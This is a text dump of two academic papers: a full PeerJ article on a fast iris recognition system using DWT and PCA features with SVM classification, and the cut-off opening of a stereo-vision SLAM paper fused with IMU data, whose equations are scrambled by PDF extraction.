work_a3hd5m5c6naslhdfexvsz5cxna ---- Submitted 13 November 2018 Accepted 11 March 2019 Published 8 April 2019 Corresponding author Mohammad Ali Moni, mohammad.moni@sydney.edu.au Academic editor Pablo Arbelaez Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.184 Copyright 2019 Rana et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A fast iris recognition system through optimum feature extraction Humayan Kabir Rana1, Md. Shafiul Azam2, Mst. Rashida Akhtar3, Julian M.W. Quinn4 and Mohammad Ali Moni4,5 1 Department of Computer Science and Engineering, Green University of Bangladesh, Dhaka, Bangladesh 2 Department of Computer Science and Engineering, Pabna University of Science and Technology, Pabna, Bangladesh 3 Department of Computer Science and Engineering, Varendra University, Rajshahi, Bangladesh 4 Bone Biology Division, Garvan Institute of Medical Research, NSW, Australia 5 School of Medical Sciences, Faculty of Medicine and Health, The University of Sydney, Sydney, Australia ABSTRACT With an increasing demand for stringent security systems, automated identification of individuals based on biometric methods has been a major focus of research and development over the last decade. Biometric recognition analyses unique physiological traits or behavioral characteristics, such as an iris, face, retina, voice, fingerprint, hand geometry, keystrokes or gait. The iris has a complex and unique structure that remains stable over a person’s lifetime, features that have led to its increasing interest in its use for biometric recognition. In this study, we proposed a technique incorporating Principal Component Analysis (PCA) based on Discrete Wavelet Transformation (DWT) for the extraction of the optimum features of an iris and reducing the runtime needed for iris template classification. The idea of using DWT behind PCA is to reduce the resolution of the iris template. DWT converts an iris image into four frequency sub-bands. One frequency sub-band instead of four has been used for further feature extraction by using PCA. Our experimental evaluation demonstrates the efficient performance of the proposed technique. Subjects Human–Computer Interaction, Computer Vision, Security and Privacy Keywords Biometrics, Iris Recognition, PCA, DWT, Gabor filter, Hough Transformation, Daugman’s Rubber Sheet Model INTRODUCTION Biometric recognition refers to the study of identifying persons based on their unique physical traits or behavioral characteristics (Umer, Dhara & Chanda, 2017). Physical characteristics commonly include an iris, face, fingerprint, retina, vein, voice or hand geometry, while behavioral characteristics may include handwriting, walking gait, signature, and typing keystrokes. To be useful, a biometric requires features that can be accurately analysed to provide unique, and stable information about a person that can be used reliably in authentication applications and many advances have been made in this area (Naseem et al., 2017). The iris has easily accessible and unique features that are stable over the lifetime of an individual. For this reason, iris recognition technology has been widely studied in the field of information security. Iris recognition systems can already be applied to identify individuals in controlled access and security zones, and could feasibly be How to cite this article Rana HK, Azam MS, Akhtar MR, Quinn JMW, Moni MA. 2019. A fast iris recognition system through optimum feature extraction. PeerJ Comput. Sci. 5:e184 http://doi.org/10.7717/peerj-cs.184 https://peerj.com mailto:mohammad.moni@sydney.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.184 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.184 Figure 1 The outer look of a human iris. The iris is a circular structure bounded by the sclera and pupil that controls the amount of light reaching the retina. Full-size DOI: 10.7717/peerjcs.184/fig-1 used for verification of passengers at immigration, airports, stations, computer access at research organization, database access control in distributed systems etc. (Galdi, Nappi & Dugelay, 2016). Iris recognition systems can also be applied in the field of financial services such as banking services and credit card use, and such a system would not have the same vulnerabilities as passwords and numbers. Iris recognition systems are being trialled in many countries for national ID cards, immigration, national border control, airline crews, airport staffs, and missing children identification etc. (Galdi, Nappi & Dugelay, 2016). While there are still some concerns about using iris-based recognition in mass consumer applications due to iris data capturing issues, it is widely believed that, in time, the technology is likely to find its way into common use (Nabti & Bouridane, 2008). An iris is a round contractile membrane of the eye, between sclera and pupil. It begins to form during embryo gestation, being fully formed at around eight months. The uniqueness of the iris patterns comes from the richness of the texture details arising from the crypts, radial furrows, filaments, pigment frills, flecks, stripes and arching ligaments. These give rise to complex and irregular textures that are so randomly distributed as to make the human iris one of the most reliable biometric characteristics. The iris is bounded by the pupil at the inner boundary and the sclera at its outer boundary. These inner and outer boundaries are circular in shape and easily accessible but can be partially blocked by the upper and lower eyelids and eyelashes (Galdi, Nappi & Dugelay, 2016). Figure 1 shows a view of a typical human iris. In this paper, feature extraction techniques are the main focus. Indeed, the selection of optimal feature subsets has become a crucial issue in the field of iris recognition. To improve feature extraction, we propose that an approach combining Principal Component Analysis (PCA) and Discrete Wavelet Transformation (DWT) will extract the key features of an iris and thereby reduce image resolution and in turn the runtime of the classification or analysis that is required for the resulting iris templates. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 2/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-1 http://dx.doi.org/10.7717/peerj-cs.184 Figure 2 Diagram of iris recognition system. Here, Hough transform, Daugman’s rubber-sheet model, PCA + DWT and SVM are used for segmentation, normalization, feature extraction and classification re- spectively. Full-size DOI: 10.7717/peerjcs.184/fig-2 METHODOLOGY Iris recognition processing generally consists of the following steps: (i) Image acquisition (ii) Iris segmentation (iii) Normalization (iv) Feature extraction and (v) Classification. In our approach presented here, segmentation was achieved using the Hough transform for localizing the iris and pupil regions. The segmented iris region was normalized to a rectangular block with fixed polar dimensions using Daugman’s rubber sheet model. A combined PCA and DWT were applied on a fixed size normalized iris for feature extraction. The Support Vector Machine was used for classification the similarity between the iris templates. Figure 2 shows the system processes that we used for iris recognition. Image acquisition The first step in iris recognition is image acquisition, i.e., the capture of a sequence of high-quality iris images from the subject. These images should clearly show the entire eye, but particularly the iris and pupil. Preprocessing operations may be applied to the captured images in order to enhance their quality and provide sufficient resolution and sharpness (Frucci et al., 2016). In this work, the CASIA-Iris V4 database has been used instead of actual captured eye images (Tieniu Tan, 2015). CASIA-IrisV4 is an extension of CASIA-IrisV3, and contains six subsets that include three subsets (from CASIA-IrisV3), namely CASIA-Iris-Interval, CASIA-Iris-Lamp, and CASIA-Iris-Twins. The three new subsets added to CASIA-IrisV4 are CASIA-Iris-Distance, CASIA-Iris-Syn and CASIA-Iris- Thousand respectively. Center for Biometrics and Security Research (CBSR) captured images of CASIA-Iris-Interval using their self-developed iris camera. Iris images of CASIA- Iris-Interval is good for studying the texture features of iris. Iris images of CASIA-Iris- Lamp were captured with a hand-held iris sensor, and these images are well-suited for finding problems of non-linear iris normalization and robust feature representation. CBSR Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 3/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-2 http://dx.doi.org/10.7717/peerj-cs.184 Figure 3 Iris segmentation using Hough transformation. (A) Original iris image; (B) edge mapped iris using first derivative or gradient; (C) edge detected iris image. Full-size DOI: 10.7717/peerjcs.184/fig-3 collected iris images of CASIA-Iris-Twins during Annual Twins Festival in Beijing. CASIA- Iris-Twins data-sets are suitable for studying the similarities and dissimilarities between iris images of twins. CASIA-Iris-Distance images were captured by employing long-range multi-modal biometric image acquisition and recognition system. CASIA-Iris-Thousand database contains 20,000 iris images, which were captured using IKEMB-100 camera. CASIA-Iris-Thousand images are suitable for experimenting the uniqueness of iris features and developing novel iris classification methods. CASIA-IrisV4 contains a total 54,601 iris images. This includes samples from more than 1,800 genuine subjects and 1,000 virtual subjects. All iris images are 8-bit grey-level image and the file format is JPEG (Tieniu Tan, 2015). Iris segmentation Iris segmentation was used to isolate the actual iris region from a digital eye image. The iris region, (Fig. 1) can be bounded by two circles pertaining to the pupil (inner boundary) and sclera (outer boundary). Hough Transformation was employed to locate the circular iris region. Hough transformation The Hough transformation is a procedure generally used to compute the parameters of the geometric objects such as lines and circles in an image. For detecting the center coordinates and radius of the iris and pupil regions, the circular Hough transform can be used. This technique generally uses a voting procedure to find shapes of the objects within the classes available. The Hough segmentation algorithm firstly creates an edge map by computing the gradients or first derivatives of intensity values in an eye image as shown in Fig. 3. For each edge pixel in the edge map, the surrounding points on the circle at different radii are taken, and votes are cast for finding the maximum values that constitute the parameters of circles in the Hough space (Verma et al., 2012a). The center coordinates and the radius can be found using the following equation: x2c +y 2 c −r 2 =0 (1) In the Hough space, the maximum point corresponds to the center coordinates (xc,yc) and the radius ‘r’ of the circle is given by the edge points. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-3 http://dx.doi.org/10.7717/peerj-cs.184 Figure 4 Daugman’s rubber-sheet model used for iris normalization. The circular shape represents segmented iris region and the rectangular shape represents normalized iris which is equivalent to the seg- mented iris region. Full-size DOI: 10.7717/peerjcs.184/fig-4 When performing the edge detection, we have considered derivatives/gradients in the vertical direction to detect the iris-sclera boundary to decrease the effect of the eyelids which are horizontally aligned (Verma et al., 2012a). The vertical gradients are taken for locating the iris boundary and to reduce the influence of the eyelids. When performing circular Hough Transformation, not all of the edge pixels that define the circle are required for successful localization. Not only does this make circle localization more accurate, but it also makes it more efficient, since there are fewer edge points to cast votes in the Hough space (Verma et al., 2012a). Normalization Once the circular iris region is successfully segmented from an eye image, normalization is applied on it to transform the segmented circular iris region into a fixed size rectangular shape. The normalization process produces an iris region that has fixed dimensions so that two photographs of the same iris taken under the different capturing environment will have the same characteristic features (Verma et al., 2012b). In this work, Daugman’s rubber-sheet model was used to normalize iris image. Daugman’s rubber-sheet model Daugman’s rubber-sheet model is the most widely used method for iris normalization (Daugman, 1993) which converts the circular iris region into a fixed sized rectangular block. Using (2), the model transforms every pixel in the circular iris into an equivalent position on the polar axes (r,θ) where r is the radial distance and θ is the rotated angle at the corresponding radius. The radial resolution describes the number of radial lines generated around the iris region while the angular resolution is the number of data points in the radial direction. I[x(r,θ),y(r,θ)]→ I(r,θ) (2) The iris region is converted to a two-dimensional array. Horizontal dimension represents the angular resolution, and the vertical dimension represents radial resolution, as shown in Fig. 4. Where I(x,y) corresponds to the iris region, (x,y) and (r,θ) are the Cartesian and normalized polar coordinates, respectively. Ranges of θ from 0 to 2π and r from Rp Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 5/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-4 http://dx.doi.org/10.7717/peerj-cs.184 Figure 5 Iris template using one level DWT. DWT transforms normalized iris image into four- frequency sub-bands, namely LL, LH, HL and HH. Full-size DOI: 10.7717/peerjcs.184/fig-5 to Rl.x(r,θ) and y(r,θ) are defined as linear combinations of pupil boundary points (Daugman, 1993). Feature extraction Feature extraction is the most important and critical part of the iris recognition system. Feature extraction is a process of reducing the amount of data required to describe a large set of information present in an iris pattern. The successful recognition rate and reduction of classification time of two iris templates mostly depend on efficient feature extraction technique. Proposed technique for feature extraction In this section, the proposed technique produces an iris template with reduced resolution and runtime for classifying the iris templates. To produce the template, firstly DWT has been applied to the normalized iris image. DWT transforms normalized iris image into four-frequency sub-bands, namely LL, LH, HL and HH, as shown in Fig. 5. The frequency range can be represented as LL < LH < HL < HH (Ma et al., 2004; Yu-Hsiang, 0000). The LL sub-band represents the feature or characteristics of the iris (Acharya et al., 2017; Moni & Ali, 2009), so that this sub-band can be considered for further processing (Acharya et al., 2017; Zhao et al., 2018). Figure 6 shows that the resolution of the original normalized iris image is (60×300). After applying DWT on a normalized iris image the resolution of LL sub-band is (30×150). LL sub-band represents the lower resolution approximation iris with required feature or characteristics, as this sub-band has been used instead of the original normalized iris data for further processing using PCA. As the resolution of the iris template has been reduced, so the runtime of the classification will be similarly reduced. PCA has found the most discriminating information presented in LL sub-band to form feature matrix shown in Fig. 6, and the resultant feature matrix has been passed into the classifier for recognition. The mathematical analysis of PCA includes: 1. The mean of each vector is given in the equation: xm= 1 N N∑ k=1 xk (3) 2. The mean is subtracted from all of the vectors to produce a set of zero mean vectors is given in the equation: xz =xi−xm (4) Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 6/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-5 http://dx.doi.org/10.7717/peerj-cs.184 Figure 6 Iris template using PCA based on the DWT. Full-size DOI: 10.7717/peerjcs.184/fig-6 where xz is the zero mean vectors, xi is each element of the column vector, xm is the mean of each column vector. 3. The Covariance matrix is computed using the equation: c =[xzT∗xz] (5) 4. The Eigenvectors and Eigenvalues are computed using the equation: [c−γ i]e=0 (6) where γ ’s are the Eigenvalue and e’s are the Eigenvectors. 5. Each of an Eigenvectors is multiplied with zero mean vectors xz to form the feature vector. The feature vector is given by the equation: fi=[xz]e (7) Classification Classification is a process of measuring the similarity between two iris templates that have been generated in the feature extraction stage. This process gives a range of values during comparison of same iris templates and another range of values during the comparison of different iris templates generated from a different person’s eye (Rana, Azam & Akhtar, 2017). This training can ultimately enable us to determine whether the two iris templates belong to the same or different persons. In this work, Support Vector Machine was used to classify the iris images. Support vector machine Support vector machine (SVM) performs pattern recognition based on the principle of structural risk minimization. SVM is a binary classifier that optimally separates the two Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 7/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-6 http://dx.doi.org/10.7717/peerj-cs.184 Figure 7 SVM with Linear separable data. The SVM finds the hyper-plane H (w.x+b=0) that differenti- ates the two classes of linear separable data. Full-size DOI: 10.7717/peerjcs.184/fig-7 classes of data. There are two major aspects of developing SVM as a classifier. The first aspect is to determine the optimal hyperplane in between two separate classes of data and the another aspect is to transform the non-linearly separable classification problem into linearly separable problem (Czajka et al., 2017). Figure 7 shows an example of Linearly separable classification problem. Let x is a set of input feature vector and y is the class label. The input feature vectors and the class label can be represented as {xi,yi}, where i=1, 2, ..., N and y =±1. The separating hyperplane can be represented as follows, w.x+b=0 (8) which implies, yi(w.xi+b)≥1;i=1,2...N (9) Basically, {w,b} can have numerous possible values which create separating hyperplane. It is believed that points often lie between two data classes in such a way that there is always some margin in between them. SVM maximizes this margin by considering it as a quadratic problem (Barpanda et al., 2018). The SVM can make two possible decisions during iris recognition; acceptance or rejection of a person. ALGORITHM Problem Definition: The iris is a biometric characteristic that can be used to authenticate persons. This algorithm finds whether a person is authenticated or not using the iris. The objectives are: This algorithm recognizes a person using iris segmentation, normalization, DWT, PCA and SVM classifier is given in Table 1. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 8/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-7 http://dx.doi.org/10.7717/peerj-cs.184 Table 1 General algorithm of our proposed iris recognition system. Input: Eye image Output: Recognition of a person (a) Read the eye image. (b) Iris segmentation using Hough Transformation. (c) Iris normalization using Daugman’s model. (d) The DWT is applied, and the LL sub-band is considered. (e) PCA is applied on LL sub-band to form a feature vector. (f) Classification time measurement started by using a clock function. (f) Match/Non-match decision is obtained using SVM classifier. (g) Classification time measurement end. Table 2 Accuracy comparison of our proposed technique with others. Sl. Author Method Accuracy 1. MH Hamd et al. PCA 94% 2. SG Firake et al. Gabor filter 92.85% 3. J poonia et al. Gabor+PCA 82.5% 4. HK Rana et al. Our proposed 95.4% EXPERIMENTAL RESULTS AND DISCUSSIONS In this section, the proposed technique has been evaluated in the CASIA iris database, and the results have been reported. 100 iris images of 100 individuals have been enrolled in our system database for training and other 100 iris images for assessing the performance. Intel Core-i5 3.30GH processor, 4GB RAM, Windows-7 operating system and MATLAB2017a tools have been used as an experimental environment. In this study, we have developed an approach to reduce the runtime by keeping the accuracy as high as possible. The accuracy of our proposed technique is 95.4% with FAR 4% and FRR 5%, is shown in Table 2, which is better than the other methods that are used for runtime comparison. Hamd & Ahmed (2018) proposed a technique to compare two feature extraction methods, PCA and Fourier descriptors (FD), in which circular Hough transform, Daugman’s rubber sheet model and the Manhattan classifier were used for segmentation, normalization, and classification respectively. Their average accuracy for PCA was 94%. Firake & Mahajan (2016) proposed a technique to compare three feature extraction methods, Gabor filter, PCA and independent component analysis (ICA), in which Hough transform, Daugman’s rubber sheet model and Hamming distance were used for segmentation, normalization, and classification respectively. Their average accuracy was 92.85% for Gabor filter. Jyoti poonia (2016) observed the average accuracy 82.5% for Gabor filter + PCA based feature extraction technique. We have mainly evaluated the time required for classification of our proposed feature extraction techniques, and found classification-time of our proposed technique is significantly better than others. The experimental results are shown in Table 3 and Fig. 8. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 9/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.184 Table 3 Comparison of classification-time of our proposed technique with others. Runtime for each feature extraction technique has been reported by employing 100 iris templates. The mean and median of each feature extraction technique have been calculated by considering the runtime of eight attempts. Sl. Methods Runtime of 100 iris templates in second Time per attempt Mean Median 11.0352 11.0338 11.0573 11.0192 11.0345 11.0216 11.0466 1. PCA based feature extraction 11.0573 11.0354 11.0345 15.3509 15.2496 15.2808 15.2908 15.2485 15.3780 15.3501 2. Gabor filter based feature extraction 15.3315 15.3100 15.3112 13.0499 12.9177 12.9376 12.9349 12.9676 12.9880 12.9019 3. Gabor filter + PCA based feature extraction 12.9225 12.9525 12.9363 9.1325 9.1135 9.1605 9.2205 9.1969 9.1229 9.1337 4. Proposed feature extraction technique 9.1982 9.1598 9.1471 Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 10/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.184 Figure 8 Comparison of classification-time of our proposed technique with varying testing samples. Full-size DOI: 10.7717/peerjcs.184/fig-8 CONCLUSIONS In this paper, we proposed a technique that used Principal Component Analysis (PCA) based on Discrete Wavelet Transformation (DWT) for extracting the optimum features of iris images and reducing the runtime of classification of these iris templates. The point of using DWT behind PCA is to reduce the iris template resolution. DWT converts the iris image into four frequency bands, and one frequency band instead of four has been used for further feature extraction by using PCA. As the resolution of iris template has been reduced by DWT, so the runtime of classification will be reduced. Experimental evaluation using the CASIA iris image database (ver. 4) clearly demonstrated the proposed technique performs in a very efficient manner. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Humayan Kabir Rana conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 11/13 https://peerj.com https://doi.org/10.7717/peerjcs.184/fig-8 http://dx.doi.org/10.7717/peerj-cs.184 figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • Md. Shafiul Azam conceived and designed the experiments, contributed reagents/mate- rials/analysis tools, authored or reviewed drafts of the paper. • Mst. Rashida Akhtar prepared figures and/or tables, authored or reviewed drafts of the paper. • Julian M.W. Quinn approved the final draft, review and Editing. • Mohammad Ali Moni approved the final draft, review and Editing. Data Availability The following information was supplied regarding data availability: The codes and raw data are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.184#supplemental-information. REFERENCES Acharya UR, Mookiah MRK, Koh JE, Tan JH, Bhandary SV, Rao AK, Hagiwara Y, Chua CK, Laude A. 2017. Automated diabetic macular edema (DME) grading system using DWT, DCT features and maculopathy index. Computers in Biology and Medicine 84:59–68 DOI 10.1016/j.compbiomed.2017.03.016. Barpanda SS, Sa PK, Marques O, Majhi B, Bakshi S. 2018. Iris recognition with tunable filter bank based feature. Multimedia Tools and Applications 77(6):7637–7674 DOI 10.1007/s11042-017-4668-z. Czajka A, Bowyer KW, Krumdick M, VidalMata RG. 2017. Recognition of image- orientation-based iris spoofing. IEEE Transactions on Information Forensics and Security 12(9):2184–2196 DOI 10.1109/TIFS.2017.2701332. Daugman JG. 1993. High confidence visual recognition of persons by a test of statistical independence. IEEE Transactions on Pattern Analysis and Machine Intelligence 15(11):1148–1161 DOI 10.1109/34.244676. Firake SG, Mahajan PM. 2016. Comparison of iris recognition using gabor wavelet, principal component analysis and independent component analysis. International Journal of Innovative Research in Computer and Communication Engineering 4(6):12334–12342 DOI 10.15680/IJIRCCE.2016.0406293. Frucci M, Nappi M, Riccio D, Di Baja GS. 2016. WIRE: watershed based iris recognition. Pattern Recognition 52:148–159 DOI 10.1016/j.patcog.2015.08.017. Galdi C, Nappi M, Dugelay J-L. 2016. Multimodal authentication on smartphones: Combining iris and sensor recognition for a double check of user identity. Pattern Recognition Letters 82(2):144–153 DOI 10.1016/j.patrec.2015.09.009. Hamd MH, Ahmed SK. 2018. Biometric system design for iris recognition using intelligent algorithms. International Journal of Modern Education and Computer Science 10(3):9–16. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 12/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.184#supplemental-information http://dx.doi.org/10.7717/peerj-cs.184#supplemental-information http://dx.doi.org/10.7717/peerj-cs.184#supplemental-information http://dx.doi.org/10.1016/j.compbiomed.2017.03.016 http://dx.doi.org/10.1007/s11042-017-4668-z http://dx.doi.org/10.1109/TIFS.2017.2701332 http://dx.doi.org/10.1109/34.244676 http://dx.doi.org/10.15680/IJIRCCE.2016.0406293 http://dx.doi.org/10.1016/j.patcog.2015.08.017 http://dx.doi.org/10.1016/j.patrec.2015.09.009 http://dx.doi.org/10.7717/peerj-cs.184 Jyoti P, Parvati B, Sandeep KG, Shubh Lakshmi A. 2016. New improved feature extraction approach of IRIS recognition. International Journal of Computer Systems 3(1):1–3. Ma L, Tan T, Wang Y, Zhang D. 2004. Efficient iris recognition by characterizing key local variations. IEEE Transactions on Image Processing 13(6):739–750 DOI 10.1109/TIP.2004.827237. Moni M, Ali AS. 2009. HMM based hand gesture recognition: a review on techniques and approaches. In: Computer science and information technology, 2009. ICCSIT 2009. 2nd IEEE international conference on. Piscataway: IEEE, 433–437. Nabti M, Bouridane A. 2008. An effective and fast iris recognition system based on a combined multiscale feature extraction technique. Pattern Recognition 41(3):868–879 DOI 10.1016/j.patcog.2007.06.030. Naseem I, Aleem A, Togneri R, Bennamoun M. 2017. Iris recognition using class-specific dictionaries. Computers & Electrical Engineering 62:178–193 DOI 10.1016/j.compeleceng.2015.12.017. Rana HK, Azam MS, Akhtar MR. 2017. Iris recognition system using PCA based on DWT. SM Journal of Biometrics & Biostatistics 2(3):1015 DOI 10.5281/zenodo.2580202. Tieniu Tan ZS. 2015. Center for biometrics and security research. Available at http: //www.cbsr.ia.ac.cn/china/Iris%20Databases%20CH.asp (accessed on 6 November 2018). Umer S, Dhara BC, Chanda B. 2017. A novel cancelable iris recognition system based on feature learning techniques. Information Sciences 406:102–118 DOI 10.1016/j.ins.2017.04.026. Verma P, Dubey M, Basu S, Verma P. 2012a. Hough transform method for iris recognition—a biometric approach. International Journal of Engineering and Innovative Technology 1(6):43–48. Verma P, Dubey M, Verma P, Basu S. 2012b. Daughman’s algorithm method for iris recognition—a biometric approach. International Journal of Emerging Technology and Advanced Engineering 2(6):177–185. Yu-Hsiang W. Tutorial: image segmentation. Graduate Institute of Communication Engineering. Available at http://disp.ee.ntu.edu.tw/meeting/%E6%98%B1%E7%BF% 94/Segmentation%20tutorial.pdf (accessed on 6 November 2018). Zhao H, Wang J, Ren X, Li J, Yang Y-L, Jin X. 2018. Personalized food printing for portrait images. Computers & Graphics 70:188–197 DOI 10.1016/j.cag.2017.07.012. Rana et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.184 13/13 https://peerj.com http://dx.doi.org/10.1109/TIP.2004.827237 http://dx.doi.org/10.1016/j.patcog.2007.06.030 http://dx.doi.org/10.1016/j.compeleceng.2015.12.017 http://dx.doi.org/10.5281/zenodo.2580202 http://www.cbsr.ia.ac.cn/china/Iris%20Databases%20CH.asp http://www.cbsr.ia.ac.cn/china/Iris%20Databases%20CH.asp http://dx.doi.org/10.1016/j.ins.2017.04.026 http://disp.ee.ntu.edu.tw/meeting/%E6%98%B1%E7%BF%94/Segmentation%20tutorial.pdf http://disp.ee.ntu.edu.tw/meeting/%E6%98%B1%E7%BF%94/Segmentation%20tutorial.pdf http://dx.doi.org/10.1016/j.cag.2017.07.012 http://dx.doi.org/10.7717/peerj-cs.184 work_a4s2knqrb5emtnkkpytjown4ya ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-070 47 Improved Stereo Vision Robot Locating and Mapping Method Yu Haige School of computer science and engineering Xi’an Technological University Xi’an, Shaanxi, China E-mail: 279084342@qq.com Yu Fan School of computer science and engineering Xi’an Technological University Xi’an, Shaanxi, China E-mail: yffshun@163.com Wei Yanxi School of computer science and engineering Xi’an Technological University Xi’an, Shaanxi, China E-mail: 407171251@qq.com Abstract—Vision-based SLAM has an outstanding problem is not work when the camera fast motion, or camera operating environment characterized by scarce. Aiming at this problem, this paper proposes a SLAM method of IMU and vision fusion. This article uses a stereo camera to extract the image ORB feature points. During the camera movement, if the number of extracted feature points is less than a certain threshold and the camera movement cannot be estimated or the estimated camera rotation and translation is greater than a certain threshold, the camera pose is estimated by fusing IMU , Otherwise use feature points to estimate camera pose. This paper uses non-linear optimization methods to perform pose estimation of pure feature points and pose estimation of fused IMU, respectively. The experimental results show that binocular vision SLAM with IMU information can estimate the camera pose more accurately. Keyword-Robot; IMU; Stereo Vision; SLAM I. INTRODUCTION With the development of robot technology, more and more robots are approaching our lives, such as sweeping robots, shopping mall robots, etc. Mobile robots are the product of the cross fusion of various disciplines and technologies. Among them, SLAM(Simultaneous Localization and Mapping) is an important technology for mobile robots. SLAM means that the robot builds a map of the surrounding environment in real time based on sensor data without any prior knowledge, and infers its own positioning based on the map. From the 1980s to the present, more and more sensors are used in SLAM, from early sonar, to later 2D/3D lidar, to monocular, binocular, RGBD, ToF and other cameras. Compared with lidar, cameras used in vision SLAM have become the focus of current SLAM research due to their advantages such as low price, light weight, large amount of image information, and wide application range. Stereo cameras generally consist of two pinhole cameras placed horizontally. Compared to monocular vision's scale uncertainty and pure rotation problems, binocular cameras can directly calculate the pixel depth. At the same time, compared to RGB-D cameras, stereo cameras collect images International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 48 directly from ambient light and can be used indoors and outdoors. Compared with lidar, the main disadvantage of the camera as a SLAM sensor is that when the camera moves too fast, the camera will blur images, and the camera will not work in a scene with insufficient environmental feature textures and few feature points. Aiming at the problems of the above-mentioned visual SLAM system, this paper proposes an algorithm that fuses IMU and SLAM. Through the fusion of IMU, it can provide a good initial pose for the system. At the same time, during the camera movement process, it makes up for the shortcomings of visual SLAM, ensuring the accuracy of the camera pose estimation in the case of fast camera movement and lack of environmental texture. II. RELATED WORKS A. Camera coordinate system Camera models generally have four coordinate systems: a pixel coordinate system, an image coordinate system, a world coordinate system, and a camera coordinate system. Figure 1: Figure 1. Camera related coordinate system Among them, w w w w O X Y Z is the world coordinate system. The world coordinate system is the reference coordinate system in the visual SLAM system. The positions of the camera trajectory and map points are described based on this coordinate system. The unit is m . i O xy is the image coordinate system. The image coordinate system uses the intersection of the camera optical center and the image plane coordinate system as the origin. The unit is mm . c c c c O X Y Z is the camera coordinate system. The camera coordinate system uses the camera optical center as the origin, and the directions parallel to the x -axis and y -axis of the image coordinate system are respectively taken as the c X -axis and c Y -axis, and the direction perpendicular to the image plane is the c Z -axis. The unit is m . O uv is the pixel coordinate system. The origin of the pixel coordinate system is generally the upper left corner of the image, with the u axis to the right parallel to the x axis, and the v axis to the y axis. The unit is pixel. B. Camera projection model The camera maps the coordinate points of the three-dimensional world to the two-dimensional image plane. This process is generally a pinhole model. Under the pinhole model, it is assumed that there is a spatial point P , and the coordinates of the point P are [ , , ] T X Y Z . After the projection of the small hole O , the point P falls on the imaging plane o xy , and the imaging point is p , The p -point coordinate is [ , , ] T x y z . Let the distance from the imaging plane to the small hole be the focal length f . Therefore, according to the principle of triangle similarity, there are:  Z X Y f x y     International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 49 So we can get:  X x f Z Y y f Z         The difference between the pixel coordinate system and the imaging plane is a zoom and a translation of the origin. Suppose that the pixel coordinates are scaled  times on the u axis and  times on the v axis, and the origin is translated , T x y c c   , so we can get:  x y u x c v y c          Equation (3) is substituted into equation (2) to get:  x x y y X u f c Z Y v f c Z           The unit of f is m and the unit of  and  is /pixel m , so the unit of , x f and y f is pixel . Written as a matrix:  0 1 1 0 1 0 0 1 x x y y u f c X v f c Y Z Z Z                           ΚΡ   Among them, the matrix K is called the internal parameter matrix of the camera, and P is the coordinate representation of the space point in the camera coordinate system. Let the coordinate P of the space point in the camera coordinate system correspond to the coordinate Pw in the world coordinate system, and use coordinate transformation to obtain:  ( ) 1 uv w w u Z Z v              P K RP t KTP   Among them, T represents the pose of the camera relative to the world coordinate system, and can also be called the external parameter of the camera. In summary, the pinhole camera model uses the triangle similarity relationship to obtain the relationship between space points and pixels, which is a relatively ideal model. In practice, there will be errors in the manufacture and installation of optical lenses, which will affect the propagation of light during the imaging process and cause distortion in the images collected by the camera. Here we mainly consider radial distortion and tangential distortion. Radial distortion is caused by the shape of the lens, and the distortion increases as the distance between the pixel and the center of the image increases. Therefore, a polynomial function can be used to describe the changes before and after the distortion, that is, the quadratic and higher-order polynomial functions related to the distance between the pixel and the center of the image can be used for correction. The polynomial of the coordinate change before and after the radial distortion correction is as follows:  2 4 6 1 2 3 2 4 6 1 2 3 (1 r r r ) (1 r r r ) corrected corrected x x k k k y y k k k             Among them,  , T x y is the coordinates of the uncorrected points, and   T corrected corrected x y， is the coordinates of the points after the distortion is corrected. r is the distance from the point (x, y) to the origin. 𝑘1，𝑘2 and 𝑘3 are three radial distortion International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 50 parameters. Usually these three parameters can be obtained by the calibration step. For tangential distortion, the reason is that the lens and the imaging plane cannot be strictly parallel during camera assembly. Tangential distortion can be corrected using two other parameters, p1 and p2:  2 2 1 2 2 2 2 1 2 (r 2 ) 2 (r 2 ) corrected corrected x x p xy p x y y p xy p y             Considering the two types of distortion, we can find the correct position of a pixel in the pixel coordinate system through 5 distortion coefficients:  2 4 6 2 2 1 2 3 1 2 2 4 6 2 2 1 2 3 2 1 (1 ) 2 ( 